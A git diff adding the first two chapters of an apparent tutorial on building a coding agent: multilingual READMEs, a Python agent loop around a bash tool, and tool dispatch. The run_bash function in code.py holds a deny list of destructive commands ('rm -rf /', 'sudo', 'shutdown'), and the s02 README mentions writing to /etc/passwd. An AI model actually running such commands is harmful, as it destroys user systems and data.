+ + diff --git a/s01_agent_loop/README.ja.md b/s01_agent_loop/README.ja.md new file mode 100644 index 000000000..8870e6349 --- /dev/null +++ b/s01_agent_loop/README.ja.md @@ -0,0 +1,193 @@ +# s01: Agent Loop — ループ一つで十分 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +`s01` → [s02](../s02_tool_use/) → s03 → s04 → ... → s19 +> *"One loop & Bash is all you need"* — ツール一つ + ループ一つ = 一つの Agent。 +> +> **Harness レイヤー**: ループ — モデルと現実世界をつなぐ最初の架け橋。 + +--- + +## 課題 + +言語モデルはコードについて推論できるが、現実世界には触れられない — ファイルを読めない、コマンドを実行できない、エラーを見られない。 + +ツール(例:bash)を一つ与えれば、最初の呼び出しで結果を得られる。しかしその後は? + +**あなたが結果をコピーしてチャットに貼り付け、続きを促す。** あなたがループそのものだ。この「コピー&ペースト」を自動化する必要がある。 + +--- + +## ソリューション + +![Agent Loop](images/agent-loop.ja.svg) + +一つの `while True` ループ — モデルがツールを呼べば続き、呼ばなければ停止。全体でたった 2 つのシグナル: + +| シグナル | 意味 | ループの動作 | +|----------|------|-------------| +| `stop_reason == "tool_use"` | モデルが「ツールが必要」と挙手 | 実行 → 結果を戻す → 続行 | +| `stop_reason != "tool_use"` | モデルが「完了」と宣言 | ループ終了 | + +--- + +## 仕組み + +このプロセスをコードに変換してみよう。ステップごとに: + +**ステップ 1**:ユーザーの質問を最初のメッセージとして設定する。 + +```python +messages = [{"role": "user", "content": query}] +``` + +**ステップ 2**:メッセージとツール定義を一緒に LLM に送信する。 + +```python +response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, +) +``` + +**ステップ 3**:モデルの応答を追加し、ツールを呼び出したか確認する。呼び出しなし → 終了。 + +```python +messages.append({"role": "assistant", "content": response.content}) +if response.stop_reason != "tool_use": + return +``` + +**ステップ 4**:モデルが要求したツールを実行し、結果を収集する。 + +```python +results = [] +for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) +``` + +**ステップ 5**:ツールの結果を新しいメッセージとして追加し、ステップ 2 に戻る。 + +```python +messages.append({"role": "user", "content": results}) +``` + +完全な関数に組み立てる: + +```python +def agent_loop(messages): + while True: + response = 
client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != "tool_use": + return + + results = [] + for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + messages.append({"role": "user", "content": results}) +``` + +30 行未満 — これが Agent の全てだ。次の 18 章はすべてこのループの上に仕組みを積み重ねていく。ループ自体は永遠に変わらない。 + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s01_agent_loop/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Create a file called hello.py that prints "Hello, World!"` +2. `List all Python files in this directory` +3. `What is the current git branch?` + +観察のポイント:モデルがツールを呼び出すとき(ループ継続)、呼び出さないとき(ループ終了)の違い。 + +--- + +## 次へ + +現在、モデルが持っているのは bash だけだ — ファイルを読むには `cat`、書くには `echo ... >`、探すには `find`。不便でエラーも起きやすい。 + +→ s02 Tool Use:5 つの本格的なツールを与えたらどうなる? モデルは複数のツールを同時に呼び出すか? 並列実行で競合は起きないか? + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `src/query.ts`(1729 行)の完全分析に基づく。核心的な違いは二つ:CC は `stop_reason` フィールドを確認せず、コンテンツに `tool_use` ブロックが含まれるかをチェックする(ストリーミングレスポンスでは `stop_reason` が信頼できないため)。CC には本番環境向けのより多くの終了パスとリカバリ戦略がある。 + +**教育版の 30 行 `while True` が CC の 1729 行の核心。** 以下の各項目は、すべてその核心の上に積み重ねられた保護機構である。 + +
+一、ループ構造の違い + +教育版は `response.stop_reason` をチェックする。CC はこのフィールドを使わない — ストリーミングレスポンスでは、`stop_reason` がまだ更新されていなくても、コンテンツに既に `tool_use` ブロックが含まれている可能性がある。CC は `needsFollowUp` フラグを使用する:ストリーミングメッセージの受信時(`query.ts:832-835`)に、`tool_use` ブロックが検出されると `true` に設定される。 + +```typescript +// query.ts:554-558 +// stop_reason === 'tool_use' is unreliable. +// Set during streaming whenever a tool_use block arrives. +let needsFollowUp = false +``` + +
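この判定は教育版の Python でも数行で再現できる。以下は `stop_reason` の代わりに content を走査するスケッチ(関数名・引数は説明用の仮定。CC の実装は TypeScript):

```python
def needs_follow_up(content_blocks) -> bool:
    """content 内に tool_use ブロックがあれば継続、なければ終了。
    CC の needsFollowUp フラグに相当する簡略スケッチ。"""
    for block in content_blocks:
        # SDK オブジェクト(.type)と dict の両方に対応
        block_type = (
            block.get("type") if isinstance(block, dict)
            else getattr(block, "type", None)
        )
        if block_type == "tool_use":
            return True
    return False
```

ストリーミング中にブロックが届いた時点で判定できるため、`stop_reason` の更新を待つ必要がない。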
+ +
+二、State オブジェクトの全 11 フィールド(教育版は messages のみ使用) + +| # | フィールド | 用途 | 対応章 | +|---|-----------|------|--------| +| 1 | `messages` | 現在のイテレーションのメッセージ配列 | s01 | +| 2 | `toolUseContext` | ツール、シグナル、権限コンテキスト | s02 | +| 3 | `autoCompactTracking` | 圧縮状態の追跡 | s08 | +| 4 | `maxOutputTokensRecoveryCount` | トークンリカバリ試行回数(上限 3) | s11 | +| 5 | `hasAttemptedReactiveCompact` | 今回のラウンドでリアクティブ圧縮を試みたか | s08 | +| 6 | `maxOutputTokensOverride` | 8K→64K へのアップグレード上書き | s11 | +| 7 | `pendingToolUseSummary` | バックグラウンド Haiku 生成のツール使用要約 | s08 | +| 8 | `stopHookActive` | 停止フックがブロッキングエラーを発生させたか | s04 | +| 9 | `turnCount` | ターン数(maxTurns チェック用) | s01 | +| 10 | `transition` | 前回の継続理由 | s11 | +| 11 | `taskBudgetRemaining` | 圧縮境界をまたぐ task_budget | s05 | + +
+ +
+三、終了パス(10 個)と継続パス(7 種)
+
+教育版には 1 つの終了パスしかない。CC には 10 の `return` ポイントと 7 種類の「継続」モードがある(終了せず、異なる理由で次のラウンドに入る)。これらが本番環境の Agent に必須の保護層だ — タイムアウト、予算超過、ユーザー中断、ツール実行中の中止など。各シナリオには対応するリカバリまたは終了戦略がある。
+
+ +
+四、ストリーミングツール実行と QueryEngine + +CC の `StreamingToolExecutor`(`query.ts:561`)は、モデルがまだ生成中にツールの並列実行を開始できる。`QueryEngine.ts` はさらに、コスト超過や構造化出力の検証失敗などの保護を追加する。教育版はこれらを実装しない — 目標は概念の明確さであり、極限のパフォーマンスではない。 + +
+ +**一言で**: query.ts の 1729 行の核心は 30 行の `while True`。複雑なフィールドや終了パスはすべて保護機構だ。まず核心のループを理解すれば、その後のすべては自然に理解できる。 + +
+ + diff --git a/s01_agent_loop/README.md b/s01_agent_loop/README.md new file mode 100644 index 000000000..12e189917 --- /dev/null +++ b/s01_agent_loop/README.md @@ -0,0 +1,193 @@ +# s01: Agent Loop — 一个循环就够了 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +`s01` → s02 → s03 → s04 → ... → s19 +> *"One loop & Bash is all you need"* — 一个工具 + 一个循环 = 一个 Agent。 +> +> **Harness 层**: 循环 — 模型与真实世界的第一道连接。 + +--- + +## 问题 + +语言模型能推理代码,但碰不到真实世界——不能读文件、不能跑命令、不能看报错。 + +你可以给它一个工具(比如 bash),让它第一次调用拿到了结果。但然后呢? + +**你自己把结果复制粘贴回对话框,再让它继续。** 那你就是那个循环。我们要做的,就是把这个"复制粘贴"自动化。 + +--- + +## 解决方案 + +![Agent Loop](images/agent-loop.svg) + +一个 `while True` 循环,模型调用工具就继续,不调用就停。整个过程只有两个信号: + +| 信号 | 含义 | 循环动作 | +|------|------|---------| +| `stop_reason == "tool_use"` | 模型举手说"我要用工具" | 执行 → 结果喂回去 → 继续 | +| `stop_reason != "tool_use"` | 模型说"我做完了" | 退出循环 | + +--- + +## 工作原理 + +将这个过程翻译成代码。分步来看: + +**第 1 步**:把用户的问题作为第一条消息。 + +```python +messages = [{"role": "user", "content": query}] +``` + +**第 2 步**:将消息和工具定义一起发给 LLM。 + +```python +response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, +) +``` + +**第 3 步**:追加模型回答,检查它是否调了工具。没调 → 结束。 + +```python +messages.append({"role": "assistant", "content": response.content}) +if response.stop_reason != "tool_use": + return +``` + +**第 4 步**:执行模型要求的工具,收集结果。 + +```python +results = [] +for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) +``` + +**第 5 步**:把工具结果作为新消息追加,回到第 2 步。 + +```python +messages.append({"role": "user", "content": results}) +``` + +组装为一个完整函数: + +```python +def agent_loop(messages): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason != 
"tool_use": + return + + results = [] + for block in response.content: + if block.type == "tool_use": + output = run_bash(block.input["command"]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + messages.append({"role": "user", "content": results}) +``` + +不到 30 行,这就是整个 Agent。后面 18 个章节都在这个循环上叠加机制——循环本身始终不变。 + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s01_agent_loop/code.py +``` + +试试这些 prompt: + +1. `Create a file called hello.py that prints "Hello, World!"` +2. `List all Python files in this directory` +3. `What is the current git branch?` + +观察重点:模型什么时候调用工具(循环继续),什么时候不调用(循环结束)? + +--- + +## 接下来 + +现在模型手里只有 bash 一个工具——读文件要 `cat`,写文件要 `echo ... >`,找个文件要 `find`,又丑又容易出错。 + +s02 Tool Use → 给它 5 个真正的工具,会发生什么?模型会不会一次调用多个工具?几个工具同时跑会不会互相踩? + +
+深入 CC 源码 + +> 以下内容基于 CC 源码 `src/query.ts`(1729 行)的完整分析。核心差异就两个:CC 不看 `stop_reason` 字段而是检查内容里有没有 tool_use 块(因为流式响应中 stop_reason 不可靠);CC 有更多的退出路径和恢复策略做生产级保护。 + +**教学版的 30 行 `while True` 就是 CC 1729 行的核心。** 下面每一项都是在这个核心上叠加的保护机制。 + +
+一、循环结构差异 + +教学版检查 `response.stop_reason`。CC 不用这个字段——流式响应中 `stop_reason` 可能还没更新但内容里已经有 `tool_use` 块了。CC 用 `needsFollowUp` 标志:接收到流式消息时(`query.ts:832-835`),只要检测到 `tool_use` 块就设为 `true`。 + +```typescript +// query.ts:554-558 +// stop_reason === 'tool_use' is unreliable. +// Set during streaming whenever a tool_use block arrives. +let needsFollowUp = false +``` + +
+ +
+二、State 对象完整 11 字段(教学版只用 messages) + +| # | 字段 | 用途 | 对应章节 | +|---|------|------|---------| +| 1 | `messages` | 当前迭代的消息数组 | s01 | +| 2 | `toolUseContext` | 工具、信号、权限上下文 | s02 | +| 3 | `autoCompactTracking` | 压缩状态追踪 | s08 | +| 4 | `maxOutputTokensRecoveryCount` | token 恢复尝试次数(上限 3) | s11 | +| 5 | `hasAttemptedReactiveCompact` | 本轮是否已尝试响应式压缩 | s08 | +| 6 | `maxOutputTokensOverride` | 8K→64K 的升级覆盖 | s11 | +| 7 | `pendingToolUseSummary` | 后台 Haiku 生成的 tool use 摘要 | s08 | +| 8 | `stopHookActive` | 停止钩子是否产生阻塞错误 | s04 | +| 9 | `turnCount` | 轮次计数(maxTurns 检查) | s01 | +| 10 | `transition` | 上一次继续原因 | s11 | +| 11 | `taskBudgetRemaining` | 跨压缩边界的 task_budget | s05 | + +
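把表中 11 个字段落到教学版的 Python 里,大致是这样一个状态对象(字段名按表格直译,类型与默认值为假设,仅作示意):

```python
from dataclasses import dataclass, field
from typing import Any, Optional

@dataclass
class QueryState:
    """CC query.ts State 对象的教学版示意(默认值为假设)。"""
    messages: list = field(default_factory=list)        # s01:消息数组
    tool_use_context: Optional[Any] = None              # s02:工具/权限上下文
    auto_compact_tracking: Optional[Any] = None         # s08:压缩状态追踪
    max_output_tokens_recovery_count: int = 0           # s11:恢复尝试,上限 3
    has_attempted_reactive_compact: bool = False        # s08:本轮响应式压缩
    max_output_tokens_override: Optional[int] = None    # s11:8K→64K 覆盖
    pending_tool_use_summary: Optional[str] = None      # s08:后台生成的摘要
    stop_hook_active: bool = False                      # s04:停止钩子阻塞
    turn_count: int = 0                                 # s01:轮次计数
    transition: Optional[str] = None                    # s11:上次继续原因
    task_budget_remaining: Optional[int] = None         # s05:任务预算
```

教学版只保留 `messages` 和轮次的概念,其余字段在各自章节引入。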
+ +
+三、退出路径(10 个)和继续路径(7 个) + +教学版只有 1 条退出路径。CC 有 10 个 `return` 点和 7 种"继续"方式(不退出但以不同原因进入下一轮)。这是生产级 Agent 必须的保护层——超时、超预算、用户中断、工具执行中被中止等等。每种场景都有对应的恢复或退出策略。 + +
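多退出路径的形状可以用一个判定函数示意(场景与阈值均为假设,CC 的 10 个 `return` 点远比这细):

```python
def check_exit(state: dict, max_turns: int = 50, budget_usd: float = 5.0):
    """返回退出原因字符串;返回 None 表示继续下一轮(纯示意)。"""
    if state.get("interrupted"):
        return "user_interrupt"       # 用户中断
    if state.get("turn_count", 0) >= max_turns:
        return "max_turns"            # 轮次上限
    if state.get("cost_usd", 0.0) >= budget_usd:
        return "budget_exceeded"      # 超预算
    if state.get("tool_aborted"):
        return "tool_aborted"         # 工具执行中被中止
    return None
```

这类检查放在每轮循环开头;命中任意一条就走对应的恢复或退出策略。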
+ +
+四、流式工具执行和 QueryEngine + +CC 的 `StreamingToolExecutor`(`query.ts:561`)让工具在模型还在生成时就开始并行执行。`QueryEngine.ts` 额外加了费用超限、结构化输出验证失败等保护。教学版不实现这些——目标是概念清晰,不是性能极致。 + +
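"工具并行执行"这个概念本身可以用线程池近似(示意;CC 的 StreamingToolExecutor 是流式启动的,远比这复杂):

```python
from concurrent.futures import ThreadPoolExecutor

def run_concurrent_tools(blocks: list, handlers: dict) -> list:
    """并行执行一组并发安全的工具调用,按提交顺序返回结果(示意)。"""
    with ThreadPoolExecutor(max_workers=4) as pool:
        futures = [
            pool.submit(handlers[b["name"]], **b["input"]) for b in blocks
        ]
        # f.result() 按提交顺序取值,结果顺序与调用顺序一致
        return [f.result() for f in futures]
```
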
+ +**一句话**:1729 行的 query.ts 核心就是 30 行 `while True`。所有复杂字段和退出路径都是保护机制。先理解核心循环,后面的一切自然展开。 + +
+ + diff --git a/s01_agent_loop/code.py b/s01_agent_loop/code.py new file mode 100644 index 000000000..6a4459d3b --- /dev/null +++ b/s01_agent_loop/code.py @@ -0,0 +1,137 @@ +#!/usr/bin/env python3 +""" +s01_agent_loop.py - The Agent Loop + +The entire secret of an AI coding agent in one pattern: + + while stop_reason == "tool_use": + response = LLM(messages, tools) + execute tools + append results + + +----------+ +-------+ +---------+ + | User | ---> | LLM | ---> | Tool | + | prompt | | | | execute | + +----------+ +---+---+ +----+----+ + ^ | + | tool_result | + +---------------+ + (loop continues) + +This is the core loop: feed tool results back to the model +until the model decides to stop. Production agents layer +policy, hooks, and lifecycle controls on top. + +Usage: + pip install anthropic python-dotenv + ANTHROPIC_API_KEY=... python s01_agent_loop/code.py +""" + +import os +import subprocess + +try: + import readline + # macOS 的 libedit 在处理中文输入时有退格问题,这四行修复它 + readline.parse_and_bind('set bind-tty-special-chars off') + readline.parse_and_bind('set input-meta on') + readline.parse_and_bind('set output-meta on') + readline.parse_and_bind('set convert-meta off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) + +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +SYSTEM = f"You are a coding agent at {os.getcwd()}. Use bash to solve tasks. Act, don't explain." 
+ +# ── Tool definition: just bash ──────────────────────────── +TOOLS = [{ + "name": "bash", + "description": "Run a shell command.", + "input_schema": { + "type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"], + }, +}] + + +# ── Tool execution ──────────────────────────────────────── +def run_bash(command: str) -> str: + dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"] + if any(d in command for d in dangerous): + return "Error: Dangerous command blocked" + try: + r = subprocess.run(command, shell=True, cwd=os.getcwd(), + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + except (FileNotFoundError, OSError) as e: + return f"Error: {e}" + + +# ── The core pattern: a while loop that calls tools until the model stops ── +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + + # Append assistant turn + messages.append({"role": "assistant", "content": response.content}) + + # If the model didn't call a tool, we're done + if response.stop_reason != "tool_use": + return + + # Execute each tool call, collect results + results = [] + for block in response.content: + if block.type == "tool_use": + print(f"\033[33m$ {block.input['command']}\033[0m") + output = run_bash(block.input["command"]) + print(output[:200]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + + # Feed tool results back, loop continues + messages.append({"role": "user", "content": results}) + + +# ── Entry point ────────────────────────────────────────── +if __name__ == "__main__": + print("s01: Agent Loop") + print("输入问题,回车发送。输入 q 退出。\n") + + history = [] + while True: + try: + query = input("\033[36ms01 >> \033[0m") + except (EOFError, 
KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + # Print the model's final text response + response_content = history[-1]["content"] + if isinstance(response_content, list): + for block in response_content: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s01_agent_loop/images/agent-loop.en.svg b/s01_agent_loop/images/agent-loop.en.svg new file mode 100644 index 000000000..541ab3f96 --- /dev/null +++ b/s01_agent_loop/images/agent-loop.en.svg @@ -0,0 +1,86 @@ + + + + + + + + + + + + + + + + + + + + + + + + Agent Loop — A while Loop Drives the Entire Agent + + + + User Query + "Create hello.py for me" + + + + + + + messages[] + Accumulated message list + + + + + + + LLM + + Model reads message history + Decision: Need a tool? + Returns stop_reason signal + + + + + + + stop_reason + == "tool_use"? + + + + No + + + + Return Result + Loop Ends + + + + Yes + + + + Execute Tool Call + run_bash(command) + + + + Append tool_result to messages + + + + Core: a + while True + loop. Model calls tool → Execute → Feed back → Ask again. No tool call → Stop. + All subsequent chapters layer mechanisms on top of this loop. + diff --git a/s01_agent_loop/images/agent-loop.ja.svg b/s01_agent_loop/images/agent-loop.ja.svg new file mode 100644 index 000000000..ee726e697 --- /dev/null +++ b/s01_agent_loop/images/agent-loop.ja.svg @@ -0,0 +1,86 @@ + + + + + + + + + + + + + + + + + + + + + + + + Agent Loop — 一つの while ループで Agent 全体を駆動 + + + + ユーザーの質問 + "hello.py を作って" + + + + + + + messages[] + 累積メッセージリスト + + + + + + + 大規模言語モデル (LLM) + + モデルがメッセージ履歴を読む + 判断:ツールが必要か? + stop_reason シグナルを返す + + + + + + + stop_reason + == "tool_use"? 
+ + + + No + + + + 結果を返す + ループ終了 + + + + Yes + + + + ツール呼び出しを実行 + run_bash(command) + + + + tool_result を messages に追加 + + + + 核心:一つの + while True + ループ。ツール呼出 → 実行 → 結果を戻す → 再度問う。ツールなし → 停止。 + 以降の全章がこのループの上に仕組みを積み重ねる。 + diff --git a/s01_agent_loop/images/agent-loop.svg b/s01_agent_loop/images/agent-loop.svg new file mode 100644 index 000000000..87c6b5008 --- /dev/null +++ b/s01_agent_loop/images/agent-loop.svg @@ -0,0 +1,86 @@ + + + + + + + + + + + + + + + + + + + + + + + + Agent Loop — 一个 while 循环驱动整个 Agent + + + + 用户提问 + "帮我创建 hello.py" + + + + + + + messages[] + 累积式消息列表 + + + + + + + 大模型 (LLM) + + 模型阅读消息历史 + 判断:需要工具吗? + 返回 stop_reason 信号 + + + + + + + stop_reason + == "tool_use"? + + + + + + + + 返回结果 + 循环结束 + + + + + + + + 执行工具调用 + run_bash(command) + + + + 追加 tool_result 到 messages + + + + 核心:一个 + while True + 循环。模型调工具 → 执行 → 喂回 → 再问。不调工具就停。 + 后续所有章节都在这个循环上叠加机制。 + diff --git a/s02_tool_use/README.en.md b/s02_tool_use/README.en.md new file mode 100644 index 000000000..8c441e546 --- /dev/null +++ b/s02_tool_use/README.en.md @@ -0,0 +1,256 @@ +# s02: Tool Use — Add a Tool, Add Just One Line + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → `s02` → [s03](../s03_permission/) → s04 → ... → s19 +> *"Add a tool, add just one handler"* — The loop stays the same. Register the new tool in the dispatch map and you're done. +> +> **Harness Layer**: Tool Dispatch — Expanding the model's reach. + +--- + +## Only Bash — One Swiss Army Knife + +The s01 Agent has only one tool: bash. To read a file, `cat`; to write, `echo "..." > file.py`; to edit, `sed`. + +This makes the model suffer — it thinks "read this file" but has to translate that into `cat path/to/file`. The translation itself burns tokens and is error-prone. 
+ +**You wouldn't use a single Swiss Army knife for everything either.** + +--- + +## Bird's Eye View: Tool Dispatch — Loop Unchanged, Just Add Mapping + +![Tool Dispatch](images/tool-dispatch.en.svg) + +The s01 loop is fully preserved (LLM call, stop_reason check, message append — not a single word changed). The only change is in that one line of tool execution: `run_bash()` is replaced with `TOOL_HANDLERS[block.name]()` dispatch lookup. + +Adding a tool to the Agent requires just two things: + +1. **Define the tool**: Add one entry to the `TOOLS` array +2. **Register the handler**: Add one mapping in the `TOOL_HANDLERS` dict + +The loop itself — not a single line changed. + +--- + +## From 1 Tool to 5 Tools + +s01 had only bash: + +```python +TOOLS = [{"name": "bash", ...}] + +def run_bash(command): ... +``` + +s02 expands to 5 tools, each independently defined: + +```python +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", ...}, + {"name": "read_file", "description": "Read file contents.", ...}, + {"name": "write_file", "description": "Write content to file.", ...}, + {"name": "edit_file", "description": "Replace text in file once.", ...}, + {"name": "glob", "description": "Find files by pattern.", ...}, +] +``` + +Each tool has its own implementation function: + +```python +def run_read(path, limit=None): + lines = safe_path(path).read_text().splitlines() + if limit: + lines = lines[:limit] + return "\n".join(lines) + +def run_write(path, content): + safe_path(path).write_text(content) + return f"Wrote {len(content)} bytes to {path}" + +def run_edit(path, old_text, new_text): + text = safe_path(path).read_text() + if old_text not in text: + return "Error: text not found" + safe_path(path).write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + +def run_glob(pattern): + import glob as g + return "\n".join(g.glob(pattern, root_dir=WORKDIR)) +``` + +--- + +## Tool Dispatch: One Line Changed in the Loop + +```python 
+TOOL_HANDLERS = { + "bash": run_bash, + "read_file": run_read, + "write_file": run_write, + "edit_file": run_edit, + "glob": run_glob, +} + +# Only one line changed in the loop — from hardcoded run_bash to dispatch lookup: +for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS[block.name] # lookup + output = handler(**block.input) # call + results.append(...) +``` + +Adding a tool = one entry in `TOOLS` array + one line in `TOOL_HANDLERS` dict. The loop stays the same. + +--- + +## What If the Model Calls Multiple Tools at Once? + +![Concurrency Comparison](images/concurrency-comparison.en.svg) + +The model often returns multiple tool calls at once — "read a.py and b.py, then list all .py files". + +These three operations (read a, read b, list files) are independent and can be **executed in parallel**. But if the model first writes then reads the same file, they must be **executed sequentially** — read must wait for write to finish. + +The teaching version uses a partition approach: + +```python +def partition_tool_calls(blocks): + """Split into two groups: concurrent-safe and must-be-sequential.""" + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + # read and glob are read-only, can run concurrently + if block.name in ("read_file", "glob"): + concurrent.append(block) + else: + sequential.append(block) + return concurrent, sequential + +# Execution: first run potentially mutating tools sequentially, then read-only tools concurrently +for block in sequential: + output = execute_tool(block) + results.append(...) +for block in concurrent: + output = execute_tool(block) + results.append(...) +``` + +**Key correction**: The teaching version initially placed bash in the sequential group (because it "might modify the filesystem"). 
But bash's actual behavior depends on the specific command — `ls -la` is read-only and could safely run alongside reads; `rm file.txt` genuinely needs to be queued. CC's `isConcurrencySafe()` judges by specific input, not by tool name. The teaching version uses a simplified partition (hardcoded by tool name), which is simpler code but loses this granularity. + +This isn't perfect concurrency (no thread pool in the teaching version), but it conveys the core concept: **some tools can run simultaneously, some can't**. + +--- + +## Quick Reference + +| Concept | One-Liner | +|---------|-----------| +| TOOL_HANDLERS | Tool name → handler function dict. Add a tool = add one mapping line | +| Tool Definition | JSON schema telling the model "what I can do" | +| Partition | Separate concurrency-safe tools from those that must run sequentially | +| Loop Unchanged | s01's `while True` loop — not a single line changed | + +--- + +## Changes from s01 + +| Component | Before (s01) | After (s02) | +|-----------|-------------|-------------| +| Tool count | 1 (bash) | 5 (+read, write, edit, glob) | +| Tool execution | Hardcoded `run_bash()` | TOOL_HANDLERS dispatch lookup | +| Concurrency | None | partition_tool_calls | +| Path safety | None | safe_path validation | +| Loop | `while True` + `stop_reason` | Identical to s01 | + +--- + +## Try It + +```sh +cd learn-claude-code +python s02_tool_use/code.py +``` + +Try these prompts: + +1. `Read the file README.md and tell me what this project is about` +2. `Create a file called test.py that prints "hello", then read it back` +3. `Find all Python files in this directory` +4. `Read both README.md and requirements.txt, then create a summary file` + +What to watch for: When does the model call just one tool, and when does it call multiple at once? Are multiple tools executed sequentially or in parallel? + +--- + +## What's Next + +The Agent now has 5 tools and can do anything. But can it `rm -rf /`? Can it write to `/etc/passwd`? 
+ +→ s03 Permission: Add a gate before tool execution — is this operation safe? Does it need user approval? + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `Tool.ts`, `toolOrchestration.ts`, `toolExecution.ts`, and `StreamingToolExecutor.ts`. + +### 1. Tool Definition Approach + +**Teaching version**: `TOOLS` array + `TOOL_HANDLERS` dict. Definition and implementation are separate. +**CC**: Each tool is an independent object created by `buildTool()`, containing schema, validation, permissions, and execution. `getAllBaseTools()` aggregates all tools. + +The teaching version's separation is clearer for teaching — readers immediately see "add a tool = two definitions". + +### 2. Concurrency Safety: isConcurrencySafe() vs isReadOnly() + +This is the teaching version's biggest simplification. CC uses `isConcurrencySafe(input)` rather than `isReadOnly()` to determine concurrency: + +| | isReadOnly | isConcurrencySafe | +|---|---|---| +| FileRead | true | true | +| Glob | true | true | +| Bash `ls` | true | **true** ← key difference | +| Bash `rm` | false | false | +| TaskCreate | false | **true** ← modifies state but can be concurrent (introduced in s12) | + +CC's Bash tool's `isConcurrencySafe` equals `isReadOnly` — read-only commands can be concurrent, write commands cannot. TaskCreate modifies task files, but each writes a different file, so it can be concurrent. The teaching version hardcodes groups by tool name, losing Bash's input-dependency but preserving the core concept. + +### 3. Partition Algorithm + +CC's `partitionToolCalls()` (`toolOrchestration.ts:91`) doesn't split into two groups — it batches tool calls **by consecutive blocks**: + +``` +[read A, read B, glob *.py, bash "rm x", read C] + → batch1(concurrent): [read A, read B, glob *.py] + → batch2(serial): [bash "rm x"] + → batch3(concurrent): [read C] +``` + +Consecutive concurrency-safe calls are grouped into the same batch for concurrent execution. When a non-concurrency-safe call is encountered, a new batch starts for serial execution. 
Batches are strictly sequential. + +### 4. Validation Pipeline + +Each tool call in CC goes through a strict 5-step validation (`toolExecution.ts:599`): + +1. **Zod schema validation** (teaching version uses JSON Schema): parameter type/structure check +2. **Tool-level validateInput()**: parameter value validation (e.g., is the path within the working directory) +3. **PreToolUse hooks** (covered in s04): hooks can return messages, modify input, or block execution +4. **Permission check** (core topic of s03): canUseTool + checkPermissions → allow/deny/ask +5. **Execute tool.call()** + +The teaching version omits Zod (uses JSON Schema), omits validateInput (uses safety functions), but preserves the permission check and hook concepts. + +### 5. Streaming Tool Execution + +CC's `StreamingToolExecutor` (`StreamingToolExecutor.ts`) starts tools while the model is still generating — no waiting for the model to finish. `read_file` might complete while the model is still outputting "Let me analyze". The teaching version doesn't implement this, consistent with s01's goal — conceptual clarity, not peak performance. + +### 6. Tool Result Persistence + +Each tool has a `maxResultSizeChars` field. Results exceeding this threshold are persisted to disk, and the model sees a preview + file path. FileRead is special — set to `Infinity`, preventing file read output from being persisted again. Specifically, if FileRead's result exceeds the threshold and gets persisted, the model's next read of that persisted file would trigger another persistence → infinite loop (read file → persist → re-read → re-persist → ...). + +
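The consecutive-batch partition from section 3 can be sketched in a few lines of Python (a simplification of `partitionToolCalls`; the predicate and data shapes here are illustrative, not CC's actual types):

```python
def partition_into_batches(calls, is_concurrency_safe):
    """Group consecutive concurrency-safe calls into one concurrent batch;
    each unsafe call gets its own serial batch. Batches run in order."""
    batches = []
    for call in calls:
        safe = is_concurrency_safe(call)
        if safe and batches and batches[-1]["concurrent"]:
            batches[-1]["calls"].append(call)   # extend the concurrent run
        else:
            batches.append({"concurrent": safe, "calls": [call]})
    return batches
```

Run the batches strictly in order; within a concurrent batch, the calls may execute in parallel.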
